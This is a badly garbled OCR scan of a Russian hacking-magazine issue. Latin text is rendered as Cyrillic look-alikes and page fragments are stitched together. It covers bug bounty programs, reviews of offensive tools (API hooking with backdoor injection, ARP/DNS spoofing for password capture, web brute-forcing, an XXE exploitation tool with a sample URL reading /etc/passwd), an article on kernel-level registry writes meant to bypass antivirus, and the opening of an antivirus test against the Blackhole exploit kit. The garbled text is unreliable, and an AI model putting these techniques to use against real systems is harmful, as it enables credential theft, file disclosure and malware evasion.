И это только маленький список компаний, тем не менее 
на их стенах полно людей, которые не пожалели времени и «за 
спасибо» нашли те или иные проблемы. 


Колонка Алексея Синцова 


@ Асктомледдетелть - Мог х 
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ргодист$ ог веплсе$ апа Ваме ппаде а гееропяе отеосиге $0 це. 


Еасй пате 15124 гергесет ап поллдиа! ог сотрапу мо Раз римафе 915510560 опе ог тоге 


зесигИу ушпегаб!е$. 
Запыагу 2013 


Зам 9 Низзат 
С.К.УФПауа Китаг 
5пибпаги Мила! 
Нхам 1@\оо\ип 


Ретег атс 


Ребгцагу 2013 


Вагау Ваос® 
Кагий чем 
Еаг 2Райоу 


Нагева Уагдвап Воррапа ПБсотиусиги тете 


Егапз Возёп пр/детесн Ау. сот 


Емсепу ЕгтакКом 


С конкурсами тоже все более-менее ясно. Думаю, все пом- 
нят конкурс, который проводила компания «Яндекс» в конце 
2011 года, — «Месяц поиска уязвимостей» (где я даже занял 
второе место и выиграл какие-то деньги, которые успешно спу- 
стил в выплаты по кредиту... неудачник, да...). Затем конкурс 
плавно перерос в полноценную программу с фиксированными 
выплатами. Кроме того, известные деятели интернета, компа- 
ния Вадоо, как раз в эти минуты, пока я пишу строки, проводит 
свой месяц поиска уязвимостей — «Проверь Вадоо на проч- 
ность!». В этом конкурсе компания платит уже за все уязвимо- 
сти, которые разделены на пять уровней. Возможно, ребята 
хотят проверить свой потенциал и ограничили данный экспери- 
мент месяцем, и кто знает, что будет дальше? 

Ну а про полноценные программы ты и так знаешь, это и Ян- 
декс, и Сооде, и Гасероок. Особо тут добавить нечего — нашел 
уязвимость, отправил, тебе ее оценили и оплатили. Критерии 
оценки зависят оттипа ресурса и вида уязвимости, что подроб- 
но описано в соответствующих разделах на сайтах этих компа- 
НИЙ. 

Все-таки тут у нас колонка авторская (типа универсальная 
отмаза), поэтому не могу не сказать и про свое видение и от- 
ношение к мотивации. Я, конечно, понимаю замечательный 
подход #МоМогеРгееВис$б, но, люди, будьте людьми! Найти Х$$, 
которую никто эксплуатировать не собирается, да еще если 
это «зе! Х$$5», и требовать за это деньги — как минимум не- 
этично. Вообще, этичность — это когда ты САМ хочешь сделать 
интернет безопаснее, а не потому, что ты ожидаешь получить 
плюшку. Поэтому мы в Мока решили сделать все интереснее. 
Основная мотивация — зал славы, но тем ребятам, которые 
показали что-то достойное и интересное, мы будем дарить 
не деньги, а подарки (наши телефоны). Если уязвимость ре- 
альная и ей можно воспользоваться и сделать определенные 
действия, если можно получить что-то, то мы с удовольствием 
наградим героя. Очень важно понимать, что мы оцениваем ре- 
альную угрозу, а не теоретические проблемы с ОММА$Р. Кроме 
того, мы ценим красоту и изящество, как и все прочие фанаты 
ИТ-секурити, так что нас можно удивлять :). 

В следующий раз мы коснемся темы более глубоко и рас- 
смотрим минусы этих подходов, наиболее типовые уязвимости, 
что вообще присылают и качество этого материала. 2= 


вре /тмиегссгл/Кагтй ели 


езаНо\@узпдех-феагл.ги 


ПИ ре/Лмими Гасебоск.сопуиаРауа.ее 
НерУ/ЗпсгуртОг.орзрот. У 
Пр:/Лллими ме оо. согупасюжаохит 


р Амуинег.согтуретепайс 


ВИруУгаТаупасктеагое$.пе\ 


@стм __ РозИме Тесбпооее (Иру рузесигИу. сот) 


Дружественные 
визиты на стену славы 
от «конкурентов». 

Это весело :) 
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У\УАВММС 


Внимание! Информация представлена исключи- 
тельно с целью ознакомления! Ни авторы, ни редак- 
ция затвои действия ответственности не несут! 


Х-ТООЕЗ 
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Дмитрий «0191» Евдокимов, 
Ого На! Зесигйу 
@е\удоКтоу4$ 


СОФТ ДЛЯ ВЗЛОМА И АНАЛИЗА БЕЗОПАСНОСТИ 


Автор: Мапие! 
РГетпапае7 
Система: \\/\п00\$ 


В рэ://соде.дооде. 
сот/р/лоокте 


ПОЙМАЙ МЕНЯ 


НоокмЕ — это программа, предназначенная 
для перехвата сетевого взаимодействия с по- 
мощью захвата специальных АР!-вызовов, ответ- 
ственных за отправку и прием сетевых данных 
(таких как \\МЗАВесу, \М/ЗАВесуРгот, \М/ЗА$епа, 
\ММЗАЗепаТо, гесу, гес\тот, еп и так далее) 
в необходимом процессе. По сути, сетевой 
снифер — только трафик он смотрит на уровне 
\М/ИтАР!. НоокМЕ предоставляет удобный @Ч|- 
интерфейс, позволяющий изменять содержимое 
пакетов в реальном времени, а также удалять 
и пересылать пакеты. 

Крутая фишка инструмента — основанная на 
РУпоп система плагинов, позволяющая расши- 
рять возможности НоокМЕ и автоматизировать 
сложные задачи. Вот лишь некоторые варианты 
использования НоокмЕ: 

. анализ и модификация сетевых протоколов; 
. создание вредоносного ПО, 
встроенного в сетевой протокол; 
. исправление уязвимостей протокола 
в памяти; 
. ПгеммаЙна уровне протокола; 
. постэксплуатация. 


Интересным примером использования инстру- 
мента является сценарий, когда в процесс вне- 
дряется Баскаоог, который отрабатывает при по- 
лучении пакета с определенным содержанием. 
В одном из демонстрационных роликов автор 
инструмента показывает, как в процесс БД МУу5ОЕ 
встраивается собственный обработчик, который 
создает отдельный поток и выполняет команду, 
идущую за заранее определенным паттерном. 

Инструмент впервые был представлен на кон- 
ференции ВН!аск На{ Еигоре 2013 в Амстердаме. 


Автор: Миспае! 
Зргей7епрами 
Система: \Ип0о\м5/ 
Ипих 


ПИрз: //оипиб.сот 
терген7/АОЕЕ 


дчссие САтА ЕХТВАСТОЮ ТЕ 


СЛИВАЕМ ВСЕ САМОВО!О 


Получение информации с мобильного устрой- 
ства становится все более востребованным. АБЕЁ 
(Апагоа Ваа Ежгасог Ше) — инструмент для ав- 
томатического извлечения выбранных файлов 
базы данных ЗОШе с Апагоюа-устройств версии 
2.х. Программа написана на РУПоп и для взаи- 
модействия с устройством использует Апагоа 
ОК, в особенности АОВ-демон. АБЕТ в процессе 
своей работы гарантирует, что все файлы, кото- 
рые извлекаются с устройства, не будут каким- 
либо образом модифицированы, что очень важно 
при Тогепус-анализе. 

Сам инструмент состоит из двух разделен- 
ных модулей: модуля анализа и модуля подго- 
товки отчета, что при необходимости позволяет 
без больших усилий встраивать в АБЕЁ дополни- 
тельный функционал. 

Для извлечения данных из файлов ЗОШе базы 
данных программа разбирает низкоуровневые 
структуры данных. В текущей версии поддержи- 
вается разбор следующих баз данных с инфор- 
мацией: 

. отелефоне и $М-карте; 

. Телефонной книге и списке звонков; 
. записях в календаре; 

- 5М5; 

. ОР5$-координатах. 


Пример запуска инструмента: 


аде1.ру -4 аеу1се -1 4 


Все извлеченные данные записываются в файл 
в ХМЁ-формате, для их удобного анализа (в том 
числе другими инструментами) и отображения 
в дальнейшем. 


Автор: №с01а$ Тпрраг 
Система: Чпих 
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ОТРАВЛЯЕМ АВРИ ОМ$ 


МИМ-атака — замечательная техника, а АНР- 
и ОМ№$-спуфинг — замечательные способы для ее 
реализации. ААРмтег — это инструмент, кото- 
рый производит атаку отравления АВР-таблицы 
и ОМ№$-спуфинг Программа полностью написа- 
на на РУпоп и имеет простой и удобный @Ц|- 
интерфейс. Для фильтрации/отбора перехваты- 
ваемых данных имеется специальный интерфейс 
для плагинов, в которых описано, что и как не- 
обходимо извлекать из трафика. Так что можно 
быстро накидать плагин для выдирания пары 
логин/пароль для любого сайта (например, УК, 
«Одноклассники» и так далее). Стоит сказать, 
что в программе реализован собственный $$1$1 р, 
что не может не радовать. Программа поддержи- 
вает протоколы: 


= РТВ 

* НЫЕ 
МАР, 
> ВЫ, 

. ММТР 
 РОРЗ, 
’ ЭМТР 
. Тепе. 


Так как открыт исходный код, то нет проблем 
расширить и улучшить программу. Инструмент был 
представлен на конференции ВНаск Нат ЦЗА 2012. 

Стоит также не забывать о том, что мож- 
но обнаруживать и предотвращать атаку АВР- 
спуфинга: с помощью различных программ, типа 
агрмасй, ВИСот@АпНААР с помощью грамот- 
ной организации \1АМ№’ов, использования РРТР 
и РРРоЕ или настройки в локальной сети 1Р$ес, 
который позволяет организовать шифрованный 
трафик между узлами вместо открытого. 
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Авторы: Тимур Юнусов, Алексей Осипов 
Система: \/ пом /Мпих 


ВЕр$: //аНпиб.сот/аН$/ХХЕ-ООВ-ЕхроНаНоп- 


Тоо|5@{-юг-АшотаНоп 


Авторы: Спи$йап 
МацогейЙа, Са |о$ 
де Оо 

— Система: \//п00\$ 


ВЫ рэ://соде.доо0де. 
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ЖЕСТКО ПЕРЕБИРАЕМ \ЕВ 


\ММебауег — это инструмент для брутфорса 
на составляющие веб-приложения. Он может на- 
ходить несвязанные ресурсы (директории, серв- 
леты, скрипты, файлы и так далее), перебирать 
параметры СЕТ- и РОЗТ-запросов, перебирать 
параметры для форм (например, логин/пароль) 
и просто фаззить. Также инструмент имеет ге- 
нератор полезных нагрузок (рауюаа) и простой, 
но мощный анализатор результатов. Он будет по- 
лезен при проведении таких атак, как: 

. обнаружение файлов и директорий; 

. перебор в форме логина; 

. перебор сессии; 

. перебор параметров; 

. Ффаззинг параметров; 

. инъекции (Х$$, ЗОЁ и другие); 

. перебор Вазс- и МТМЕ-аутентификации. 


Особенности: 

. рекурсивность; 

. 1Э типов кодирования; 

. аутентификация: МТМЕ и Вазс; 

. множество рауюад$; 

. поддержка прокси; 

. фильтры для анализа результатов; 
* МНОГОПОТОЧНОСТЬ; 

. сохранение сессий сканирования; 
. интегрирован в браузер (\М/ебки); 

. атака через множество прокси. 


\Меб!ауег — это хорошая альтернатива уже 
всем известному ОиВи$ег от того же О\М/АЗР. 
А если надумаешь писать свой брутфорсер, со- 
ветую обратиться к исходным кодам данного про- 
екта — там можно найти хорошие словари для 
перебора. 
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ХМЕОЧТ-ОЕ-ВАМО 


ХМЕ остается хитом по количеству скрытых воз- 
можностей и по направлению возможных атак. 
И грех это не исследовать и не использовать. 
ХООВ — утилита, предназначенная упростить 
проверку наличия и эксплуатацию разнообраз- 
ных ХМЁ-уязвимостей, в том числе ХМЁ оч|- 
о!-Бапа. Утилита комбинирует в себе функции 
НТТР-сервера, отдающего специально сформи- 
рованные ХМ!-документы, а также НТТР- и ОМ$- 
серверов, которые принимают и логируют любые 
запросы к ним. 

Необходимость собственного НТТР-сервера 
была обусловлена тем, что обычные серверы 
не принимают строку запроса длиной более 
8 Кб по умолчанию. К тому же небольшой скрипт 
обеспечивает простоту развертывания и под- 


р Автор: Сайоз Че! Оо 
Система: \Мп0о\м$/ 
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СН ини нчииныны СОГ/О/ОГОхузКе 
АКТИВНЫЙ ПРОКСИК 


Ргоху{иКе — это активный прокси, написанный 
на Рупоп, для веб-приложений. Данный инстру- 
мент предназначен для поиска уязвимостей 
при непосредственном просмотре приложения. 
Это особенно актуально для сложных приложе- 
ний, построенных на базе /$ и АУАХ: ведь никакой 
скрипт не может полностью сымитировать рабо- 
ту пользователя и проследить за всеми этапами 
выполнения приложения (хотя отчасти с этим мо- 
жет справиться Зеепит, зе!епитпа.ога). Такой 
код муторно разбирать руками, а веб-сканеры 
не всегда делают это хорошо. Вот тогда к нам 
на помощь и приходит прокси. 

Программа содержит два плагина для нахож- 
дения: ЗОШ и Х$$. Плагин для идентификации 
ЗОН является РУйоп-портом широко известного 
ОагкРауег «ЗОМЬЪ». 

Действует данный инструмент так. РгохуЗ{иКе 
запускается как прокси и начинает прослушивать 
порт 8008 (по умолчанию). Далее необходимо 
настроить браузер таким образом, чтобы он со- 
единялся через прокси (в нашем случае через 
РгохуиКе). Теперь при работе в данном брау- 
зере РгохуЗшкКе будет анализировать все пара- 
метры в фоновом режиме. При этом для пользо- 
вателя не будет заметно никаких отличий, хотя 
в фоновом режиме работа будет кипеть. 

Также стоит отметить, что архитектура при- 
ложения разрабатывалась с возможностью даль- 
нейшего расширения, что позволяет реализовать 
недостающий/необходимый функционал, напи- 
сав соответствующий плагин для данного инстру- 
мента. С видеоруководством по использованию 
РгохуЗ ке можно ознакомиться здесь: \м/мим. 


уощирбе.сот/ма сп? у=8Кюу4ОХ7И. 


держивает популярные операционные системы: 
ММпаом/$, ЧМХ-ИКе. 

Работа с утилитой выглядит следующим обра- 
зом. В файле сопйд.ру настраиваются имя хоста 
и порт, на которые обращается проверяемый пар- 
сер. Дальнейшее взаимодействие происходит 
через строку запроса к веб-серверу. Например, 
если нужно отдать полностью сформированный 
документ, следует обратиться по адресу Пйр:// 
ем!по$1/хи!?2_З3?1е:///е1с/раззма, где П4р:// 
емИПо$Ихт| — адрес самого документа, ооб_ 
рагатщег 3 — тип эксплойта, Ше:///ес/ра$$ма — 
файл или ЦНЕ, который мы хотим читать. 

Более подробно читайте в презентации «ХМЕ 
Ощ-О|-Вапа Баа Вапеуа» с ВМаск Нат Ецчгоре 
2013 (муза этой рубрики в этот раз :)). 
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ОТКРЫТЫЙ ОТЛАДЧИК ДЛЯ Хб4 


Все больше программ начинают поддерживать 
архитектуру хб4. Конечно, 32-битное приложе- 
ние может работать на 64-битной системе через 
\МО\М/64, но оно не будет использовать всей мощи 
64-битной системы. Так что разработчики по- 
степенно портируют свои приложения на эту ар- 
хитектуру и при портировании (да и при простом 
написании) допускают ошибки, которые приводят 
к уязвимостям в 64-битной версии программы. 

Для поиска и анализа уязвимостей в бинар- 
ных приложениях незаменимы дизассемблер 
и отладчик. Если с дизассемблерами для хб4 
дело обстоит лучше, то с отладчиками со- 
всем плохо... Увы, всеми любимые ОПу)ериа 
и ттипкуд)ебиоаодег не поддерживают хб4. Пред- 
ставляю отладчик Мапот ке, написанный на С++, 
с открытым исходным кодом. Проект поддержи- 
ваетхб4-, х86- и\\/О\\64-отладку и имеет удобный 
СИ в стиле ОПу)ерид. Возможности списком: 
. отладка х86 и хб4 (+ \/О\М 64.) процессов; 
. брейкпоинты: 

. зоНмаге (п); 

. тетогу (Раде Сиага); 

. Пагам/аге (ОР СРУ Ведз); 
. пошаговая отладка (т/Оуег); 
. аНасйтча; 
. басПпо; 
. поддержка дочерних процессов; 
. Поддержка многопоточности; 
. отображение исходного кода (если есть). 


Отладчик новый, но уже сейчас хорошо пока- 
зывает себя в деле. А при обнаружении ошибки в 
его работе всегда можно ее исправить, ведь есть 
исходный код. Да, и не забывай сообщать разра- 
ботчику. 


А: №. и 
эЭ4 в Ма!гаге я 
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ВНЕДРЯЕМСЯ 
В СВЯТАЯ СВЯТЫХ | 
СИСТЕМЫ, МИНУЯ \ 
СТАНДАРТНЫЕ ] 

МЕХАНИЗМЫ — 


Александр Эккерт 
Заппс.тап@дтай. сот 


ПРЯМОЙ РАСПИЛ 
РЕЕСТРА МАМОО\/$ 


Сегодня мы попробуем залезть в реестр \ММптао\м/$ с черного хода, без использования штатных 
\МЛпАР!-функций, для-этого предназначенных. Что нам это даст в итоге? Возможность писать 
в реестр и читать из него напрямую, в обход ограничений, установленных разработчиками 
антивирусных решений! Забегая вперед, отмечу: тема эта интересна, но тут целый набор се- 
’рьезных проблем. Хотя кто сказал, что нам это не по плечу? :) 
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ПРП Я ГГ ИЛЬ ГЬГ ГЬГЕ  ГЬГЕ  ГЬГЕ ГП ГИ О О ОВ 


А воти сигнатура «гедЁ» 5, 


что ТАКОЕ РЕЕСТР, или НЕМНОГОЛИРИКИ 

С точки зрения операционной системы \М/пао\5, реестр — это 
уникальная кладовка. В этой своеобразно выстроенной иерар- 
хической базе данных хранятся настройки, данные, регистра- 
ционная информация и прочая.хрень почти обо всем в системе, 
начиная с программ и заканчивая настройками конкретного 


пользователя. В реестре хранится практически все. Несмотря | 


на то что некоторые программы предпочитают хранить свои 
настройки в !-конфигах (особенно программы, написанные 
для \\т 3.11. — Прим. ред.), сама \ММпаом/5 всю нужную инфор- 
мацию о самой себе считывает из реестра. Справедливости 
ради отметим, что в *пх-Ше операционных системах до сих 
пор господствует система хранения настроек во всевозможных 
конфигах. 

Новичков — системных администраторов при начале ‘ра- 


боты с реестром старшие товарищи пугают, что неправильная. 


настройка и изменение параметров реестра могут напрочь за- 
валить систему с последующей ее переустановкой. И это дей- 
ствительно так. 

К примеру, так называемые точки восстановления — это 
копии реестра. Они широко применяются пользователями 
при возникновении различных проблем как с операционной 
системой, так и с программным и аппаратным обеспечением. 

Надо сказать, что 99% информации о реестре \ММпаом$ — 


это описание основных ключей плюс советы, как с ними рабо-. 


тать. Но как работает с реестром сама операционная: система? 
И сможем ли мы эмулировать ее действия? Давай немного по- 
рассуждаем. 


НУИЧТО? 
Реестр — одновременно и сильная и слабая сторона \М/таом/5. 
Сильная сторона реестра в том, что для разработчиков про- 
граммного обеспечения отпадает необходимость манипули- 
ровать туевой хучей конфигов, как это, например, реализовано 
в никсах. Удобен реестр и для создателей СОМ-компонентов — 
система автоматом регистрирует такой компонент в реестре 
и облегчает задачу по его дальнейшему использованию. 
Слабость реестра в том, что доступ к модификации чувстви- 
тельных областей реестра позволяет управлять \\Мп4о\$ любой 
программе, написанной каким-нибудь новоявленным малвар- 
щиком. Вспомни хотя бы самую знаменитую ветку реестра 
\ММпао\м$, позволяющую запускать программы на старте ОС :). 
Если в \\тпао\м/5 98 реестр могли починять все, кому это 
взбредет в голову, то начиная с М/пао\м$ ХР доступ к реестру 
имеют только пользователи с учетной записью администрато- 
ра: В \М$За+ доступ к реестру находится под защитой ЦАС. Оно 


-И ‘понятно. 
2:98 Надо признать, что свыходом \М/т7 концепции безопасности 


при работе с реестром были пересмотрены в лучшую сторону. 
Например, под защитой находится ключевая ветвь реестра 
НКЕУ ГОСАЕ_ МАСНМЕ. В общем случае попытка что-то за- 
писать в нее будет перенаправлена в соответствующую ветку 
НКЕУ СУВРВЕМТ_ЧЗЕВ для текущего пользователя. 


ИНТЕРФЕЙС | 
Для работы с реестром напрямую \\тао\м/5 предлагает про- 
граммисту целый набор М/тАР!, которые должны быть знакомы 


р ВуДя 


Прямой:.распил реестра МИпао0\/$5 


ММУ? 


Обязательна к про- 
чтению статья Марка 
Руссиновича о реестре 

‚ «пе {пе Недту», 
нашелся даже русский 


‚ перевод: 000.010] 7 


` Замечательная тулза.. 
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любому системному разработчику, — это Вед*-функции, такие 
как ВедОрепКеу, РедОчцегу\аше и так далее. В ядре \\п это 
МЮОрепКеу, МОчегу\/ашекКеу и целый ряд других. Описывать их 
особого смысла нет — всю документацию по надлежащему ис- 
пользованию этих функций можно найти в МОМ. 

Здесь стоит отметить вот что. Антивирусы и проактивки 
для контроля за пользовательскими действиями устанавливали 
перехваты на упомянутые функции, как вядре, так и в юзермоде. 

С выходом \\/п7 хб4 ситуация изменилась, и я уже об этом 
как-то писал. Разработчики М/Ипао\мз решили отказаться от воз- 
можности перехватывать потенциально опасные функции вядре 
\М/п. Теперь переменная КеЗегмседезсиро!ТаЫе в хб4 больше 
не экспортируется, да и переписать нужный участок кода не по- 
лучится — Расй@иага не даст. Есть, конечно, садомазохистские 
решения по обходу этих ограничений — но там гемора будет 
больше, чем профита. Тем более что Мсго5ой предлагает удоб- 
ные колбеки ОБВесд!егСа!баск$ для контроля за реестром. 


АТЕПЕРЬ — ОСАМОМ ИНТЕРЕСНОМ 
Но что же такое реестр на самом деле? Если заглянуть в пап- 


„Ку МАМООМ/5\зу$ет32\сопйо, то можно увидеть там несколько 


файлов: зует, Зой\аге, ВЫ ЗАМ и другие. Это файлы ре- 
естра. 


Однако. а ВИ говорить о реестре просто. 


как о некоем сочетании файлов, загруженных в память. Мно- 
гое из того, что‘содержит реестр, носит динамический харак- 
тер, то есть ряд ‘значений: высчитывается на этапе загрузки 
самой системы, в первую очередь это касается определен- 
ных параметров железа. Например, таков подраздел реестра 
НКЕУ_О\УМ_ ВАТА, данные которого. при.загрузке операционной 


Если заглянуть в \УПМРО\У/$ \5у$фетз2\ 

сонйдто-можно увидеть там несколько 
файлов: зузфет, зоЙлмгаге, зесигйу, ЗАМ / 
и другие. Это файлы реестра: 


РУО 


На БУ есть несколько 
доков, описывающих 
внутреннее устройство 
реестра, пользуйся! 
Также на диске есть пара 
прог для мануального 
изучения реестра 


ши 


Файлы реестра ММп4о\м!$ 


ЕСЛИ Ска 


Теа ая дбесумеНА 


ТКБ 


системы размещаются в оперативной памяти и находятся там 
вплоть до завершения работы операционной системы. То же, 
кстати, можно сказать и о ключевом подразделе НКЕУ ГОСАЁ_ 
МАСМИУЕ, который не имеет свбего соответствующего файла 
на диске, но. фактически формируется‘ из других файлов ре- 
естра, таких как зоН\ммаге, зузет и прочие. 

Таким образом, реестр. изнутри можно весьма приблизи- 


тельно назвать «виртуаЛьным сочётанием файлов реестра». По- 


сле старта системы эти файлы находятся как в файле подкачки 


(раде роо!), так и в невыгружаемой памяти (попрадеч). » 


СТРУКТУРА РЕЕСТРА 


Для того чтобы научиться работать с реестром напрямую, 


без знаний его внутренней структуры не обойтись никак. 
В целом Мсго$ой никогда не раскрывала тайны внутренней 
структуры файлов, составляющих реестр, поскольку это угро- 
жает безопасности. По моим наблюдениям, все имеющиеся 
описания файлов реестра и его структуры (а их, кстати, совсем 
чуть-чуть) — результаты изысканий пионэров-исследователей. 
Наиболее законченное, на мой взгляд, такое «исследование» 
можно взять здесь — 900.979, принадлежит оно товарищу 
Питеру Норрису. 

Не будем вдаваться сейчас в подробности организации 
и структуры реестра, дело это долгое, нудное и в рамки статьи 
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РАБОТА С РЕЕСТРОМ с ТОЧКИ ЗРЕНИЯ ПОДСИСТЕМ ОС \ТМОСИА!$ 


АОМАРТЗ 2.04. эмспозтехе 
| эе 
КЕВМЕЕ 
ММ И - 
Мыткку Маладег 


в. 
МТЕУРАТ 
Ок 


Как\МИптао\м!$ работает с реестром 
} | Ц“ 
| 
точно не вписывается. Здесь Важно уяснить, что реестр — ие- 


рархическая древоподобная структура, иногда также говорят, 
что она похожа на пчелиные соты. 


ИЧТО СО ВСЕМ ЭТИМ ТЕПЕРЬ ДЕЛАТЬ? 

Сразу огорчу: запросто пошаманить напрямую с реестром 
в юзермоде не получится, система не даст этого сделать, 
как это обычно бывает с файлами, занятыми другими процес- 
сами. Если попытаться извернуться, то можно только прочесть 
такой «занятый» файл, и то если угадать с флагами, с которы- 
ми он был открыт. К сожалению, записать в интересующий нас 
«файл реестра» информацию`не выйдет. Кстати, фича с запи- 
Сью нужной информации в реестр может прокатить, если пи- 
сать в реестровскиё`*.ВАК-файлы „они точно доступны под за- 
пись. А вот из ядра не то что прочитать; но и.записать нужную 
информацию в-файлы реестра очень даже можно.’Итак, следи 
за рукой :): 3” В. 


‚ 


› Первое, что может прийти в твою светлую голову, — открыть 

‚ файл реестра напрямую’и что-то туда записать.Теоретически 
так сделать можно, для этого нужно, во-первых, уметь рабо- 
тать с «занятыми» файлами (способы ищи в Сети) и, во-вторых, 
как я уже говорил выше, надо знать внутреннюю структуру 
файлов реестра. Метод этот довольно топорный, но, несмотря 
на свою бредовость, он вполне жизнеспособен, хотя его и труд- 
но реализовать на практике (попробуй поэкспериментировать 
сним самостоятельно). Здесь жея предложу два способа, кото- 
рые помогут тебе распилить реестр на мелкие кусочки. 

Первый способ заключается в том, что для конфигурацион- 
ного менеджера (Сопйдигайоп Мападег, часть операционной 
системы, если ты не в курсе) реестр есть не более чем набор 
строго определенных структур в операционной памяти, с кото- 
рыми, как оказывается, очень даже легко работать. Какие это 


структуры, спросишь ты? НВАЗЕ ВЕОСК, ННМЕ, НЕМ, НСЕЦШ-; 


НМАР_ЕМТРУ НМАР_ОВЕСТОРУ, куча СМ_^* структур, использу- 
емых конфиг-менеджером для управления реестром. С точки 
зрения операционной системы, реестр — это просто набор ре- 
гламентированных структур в оперативной памяти. К примеру, 
сигнатура «гед{», определяющая «файл реестра», есть заранее 
определенная константа: ЗЫ * 


наейпе НВАЗЕ-ВЕОСК_<ТСМАТИВЕ — 0х66676572 
фуреде+' Егисе _ НВАЗЕ _ВГОСК 


4 х. 
- ОЕОМ@ 51рпакиге; //090х66676572 | 
ЕО№ 5едиепсе1; . 
У ЩеГе 5еацепсе2 у * 
„””ГАВСЕ_ТМТЕСЕВ. ТамеЗкатр; › * 


То есть смысл всего этого моего мбнолога в том, что су- 
ществует шикарная возможность манипулировать с реестром 
на уровне операционной системы, но при этом не используя 
‚ее штатные средства. Как. это. возможно? Мы просто сэму- 
`’лируем действия самой операционной системы, точно так, 


ВТЕМ 
Информации в Сети 
о структурах, описыва- 
ющих основные файлы 
реестра, очень мало. 
И почти все они 
на английском. На- 
чальные знания можно 


найти на млм. хакер. ги/ 
р051/ 1419 /Чегаы.азр. 


Кроме этого, хорошо 
про реестр написано 
в библии системщика 
«Внутреннее устройство 
МИпо\$» оттоварищей 
+М. Руссиновича 
и Д. Соломона. 


как она сама работает с реестром! Важно, как я уже говорил, 
понять, что для самой ОС реестр не более чем набор соответ- 
ствующих структур в памяти. 

Если у нас будет доступ к файлам реестра на уровне ядра, 
то чем мыхуже самой ОС, чтобы установить свой порядок? Итут 
на сцене появляется наиболее интересный вопрос — как найти 
эти самые структуры в памяти? Верно, штатных средств систе- 
мы для решения этого вопроса нет, поэтому придется выкручи- 
ваться по-хитрому. 

Зная, как выглядят структуры, нужно вспомнить, что каждый 
«файл», улей реестра, соты и т.д., имеет свою константную сиг- 
натуру. Например, «гедф» — это 0х66676572, а для улья, к приме- 
ру, сигнатура будет равна ОхВЕЕОВЕЕЙ (в целом о внутреннем 
строении реестра очень можно почерпнуть из \/\ВК, см. файл \ 
разе\щоз\шс\Имеааа.п). Имея доступ к памяти из ядра, мы мо- 
жем довольно легко найти эти сигнатуры в памяти, просто про- 
сканив ее. Еще можно просканить память в поисках сигнатуры 
«СМ10» — именно она присваивается конфиг-менеджером 
блоку подкачиваемой памяти, который выделяется под струк- 
туру СМНМЕ. Полагаю, найдя в памяти интересующий нас эле- 
мент, ты придумаешь, что делать с ним дальше :). ^ 

Как, к примеру, изменить значение ячейки реестра? Значе- 
ние хранится в поле СМ_КЕУ \МАГОЕ->О)аа, поэтому, если у тебя 
возникнет задача изменить какое-либо поле в конкретном клю- 
че реестра, ищи значение именно там: 


фуреде{ 5+гисе _СМ_КЕУ_МАШИЕ { р 


МОВО $1=2пафиге; // #аейпе 
//_СМ КЕУ МАБОЕ_$ТОМАТУВЕ ©@х6В76 
МОКО Мате еп5И; 
ИЕОМ@ БафаЁепё*И; 
ОЕОМ№б ОБафа; //<----данные ячейки будут здесь 
ИЕОМ@ Туре; 
ИОВО Е1а8$; 
ИОВО 5раге; 
ИСНАВ Мате[1]; 
} СМ КЕУ \МАЕУЕ, *РСМ _КЕУ_М\МАШОЕ; 


Второй вариант является своеобразной модификацией 
первого. Если знаешь, существует одна особенность при ра- 
боте с реестром — все изменения, то есть «создание новых 
ключей / запись / удаление ключей», как правило, вступают 
в силу после перезагрузки системы (ну или после перезагрузки 
эксплорера, это такой хак-метод). До этого все изменения на- 
ходятся словно в подвешенном, «АМу»-состоянии. Мало того, 
система при обращении с реестром общается с ним через кеш 
файловой системы. Это понятно — обращений к реестру мо- 
жет быть сотни в секунду, соответственно, полагаться при этом 
на быстродействие файловой системы неразумно, тут никакое 
быстродействие не спасет. Поэтому система и работает с ре- 
естром, что называется, виртуально, через кеш файловой си- 
стемы. И тут, чтобы вытащить кишки реестра на свет, надо за- 
лезть в кеш! Как это делается, уже описывалось в тырнетах, 


в том числе ив || (хакер.ги/тадатте/ха/131/056/1.азр). 


РВО$ & СОМ$, ИЛИ ВМЕСТО ЗАКЛЮЧЕНИЯ 

Что сказать в итоге? Предложенная читателю в статье вари- 
ация на тему прямого контроля за реестром носит исключи- 
тельно экспериментальный характер. Не спорю, она тяжело- 
вата для практической реализации, и многие скажут, что уж 
лучше использовать нормальные \М/пАР!-функции, предна- 
значенные для работы с реестром, — и будут в чем-то правы. 
Однако’ реализованная фе паг `на деле либа, основанная 
на приведенных в статье принципах, будет обладать поисти- 
не термоядерной силой, неподвластной ни аверам,. ни самой 
операционной системе. Засим закончу. Удачного компилиро- 
вания и да пребудет с тобой Сила! = 


Пошаманить напрямую с реестром в юзер- 
моде не получится, система не даст этого 
сделать, как это обычно бывает с файлами, 
занятыми другими процессами 
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Первые 10 держателей, 

потратившие рублей | 
по дебетовой и 
или рублей по кредитной 
«Мужской карте» 
получат сертификаты 
номиналом _ рублей 
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[- ПРОВЕРКА: 
АНТИВИРУСЫ 
ПРОТИВ ТОПОВОГО 
ЭКСПЛОЙТ-ПАКА 


Эксплуатация уязвимостей в про- 


граммном обеспечении на стороне ДЛЯ ТЕХ, КТО НЕ ОСИЛИЛ: 
конечного пользователя стала одним КРАТКОЕ СОДЕРЖАНИЕ 


из основных трендов на черном рынке. 
Аналитические компании прогнозиру- 
ют стабильный Рост ДОХОДОВ кибер- Мы арендовали новейший Васкпое (пришлось тряхнуть мошной, но чего не сде- 


преступников от услуг предоставления 
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У 


Денис Макрушин, ведущий 
специалист СТоад.ги 
@Не7та, Чеес.ги 


МЕТОДИКАТЕСТИРОВАНИЯ 

В числе топовых на черном рынке экс- 
плойт-паков сейчас находится Васкпо(е. 
В одном из прошлых номеров мы о нем 
уже писали, а успех этого продукта опре- 
деляется прежде всего его «наворочен- 
ностью» и обилием различных техноло- 
гий борьбы с антивирусным ПО, гибкой 
системой перенаправления трафика (так 
называемой ТО$), интерфейсом кон- 
солидации и вывода статистической 
информации. Именно последнюю вер- 
сию (на момент написания статьи) этого 
сплоит-пака мы и будем использовать 
для тестирования антивирусных реше- 
ний, участвующих в обзоре. 

Тестовый стенд будет представлять 
собой среднестатистическую конфигу- 
рацию пользовательской рабочей стан- 
ции с предустановленной ОС \ММпдо\м$ 7 
Уйтае ЕдФоп (дефолтовые настройки 
безопасности) с предустановленным 
ПО: Адобе Назй Р!ауег 10.х (не самая по- 
следняя версия, но самая распростра- 
ненная), Чауа УОК/ВЕ 1.6.0.25, Адобе 
Асгора+ 10.х, |\егпе{ Ехрогег 8.0.х. 

Методика тестирования простая: за- 
ходим по вредоносной ссылке, которая 
содержит сплоит-пак ЕВаскпое \2.0.1, 
и наблюдаем результат. Если дроппер 
связки успешно загрузил наш пферад. 
